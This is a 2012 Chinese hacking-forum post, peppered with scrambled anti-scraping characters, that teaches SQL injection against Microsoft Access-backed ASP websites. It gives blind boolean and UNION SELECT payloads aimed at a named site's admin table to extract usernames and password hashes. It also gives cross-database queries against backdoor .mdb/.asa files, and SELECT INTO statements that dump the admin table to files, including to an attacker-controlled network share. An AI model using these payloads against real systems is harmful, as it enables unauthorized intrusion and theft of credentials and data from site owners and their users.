找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2207|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------' [% D6 @% j; V1 Z! C
union查询法; L0 w) U- [; a  N
首先要说的就是查询办法,一般的查询办法就是& U& ~7 i  ^" e" y5 V* B2 w$ r

; y9 c9 b( n& \% ]- g! T+ g. [7 _程序代码4 k* ^1 Y4 J+ A. j2 G$ A0 Z) x
and 1=(select count(*) from admin where left(id,1)='1')
, n/ C6 V7 \* [* e" I' @& h8 ~- r; y
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
( K3 |+ ]4 P' k# e6 Q, W, b% w所以这个时候,union select横空出现.别以为只能在PHP里用哦...8 D# X) s# q# t2 \( `. H
譬如你有一个ACCESS点:# N3 E; e8 `2 B+ |" z
程序代码
3 j2 p/ I2 @. l/ m3 c8 @http://bbs.tian6.com/xiaoyang.asp?coder=1
8 I* G6 c4 _. r3 A9 E" X! _6 m) b( d# _$ T5 T
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
, W  k) |2 D" c( ^1 _9 v: A然后我们直接来:
- k" O: i) f- x& Z/ J; D程序代码
" D: p$ Q* v+ z! c+ I/ |http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]( l; e' E' d$ i+ _9 J
- B/ c6 s9 p1 G/ [/ A
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.; L" o' ~0 M5 ?, Q/ o" R

7 M  l* d) o' ]+ O5 v5 F. s4 i. `) G+ q# \3 ~( b4 z- M" r1 p

' k! }* A4 K% Z- S: Y/ q---------------------------------------------------------------
: F& B& O% O/ tAccess跨库查询: x! M: @6 u3 e' l  C0 _1 H# q! h
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
9 b' V! `7 `: l& O( e跨库的查询语句:8 j7 ?" O6 ?( K
子查询:
  x0 c, B3 X# M* _7 z程序代码
, J  F/ }. k( P' f; u- C' Cand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>06 r5 t" [$ E( ^. G0 p- ]

1 h: O2 x5 e. T* B& Qunion查询:) P/ x' V. x, q8 r9 `
程序代码
& X5 }# V" z7 }+ }union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
$ H! q, X- [0 F
( Y$ {2 @/ ^6 |/ Y: o( d跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
3 g- L0 J/ S9 |# c9 p, `% ?. e程序代码
1 f  U  L* T) W2 r: |http://www.4ngel.net/article/46.htm
+ J# [/ z; q- R9 M8 @; ^http://hf110.com/Article/hack/rqsl/200502/66.html
; X% O! A! B* L- b' }1 k: R; x3 _) j( j  j; `$ E
---------------------------------------------------------------
+ p0 E, N' I  a! lAccess注入,导出txt,htm,html
4 x7 h6 z. F2 _子查询语句:
9 d& W4 [. h( i; D; s& M程序代码& l, s: i$ z! [7 y/ C
Select * into [test.txt] in 'd:\web\' 'text;' from admin
- D' {3 |2 L( m: b! a; x- q. ^8 F1 B- |/ c+ O" t. }
这样就把admin表的内容以test类型存进了d:\web里面.
( d* k5 k3 o4 X( @1 gUNION查询:
  N- A  Z1 r, y, @程序代码
3 J, k8 x3 Z$ ounion select * into [admin.txt] in 'c:\' 'test;' from admin  P3 u) c# O8 `5 M1 W2 @' m

, x+ P) H+ k7 ?3 O- I6 T# F4 _7 a而且这里也可以保存到本地来:
) p8 z, y9 Z% R) l程序代码/ j* [% n- [  K1 u: Y
Select * into [test.txt] in '\\yourip\share' 'text;' from admin. q1 H+ Q  G3 W- C& I* i

( [1 s; [: i& \- U0 w$ ]' {5 D不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
4 f( }- l. V3 l/ R+ J$ ]
' H/ i# ?/ s8 Q/ I+ Y程序代码. g8 F$ @3 g7 [" B7 B
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7- ~9 o3 \1 Z4 R; W- a

6 e8 i8 ?4 ^; r9 V因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.  \6 _4 V2 v% z4 N9 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表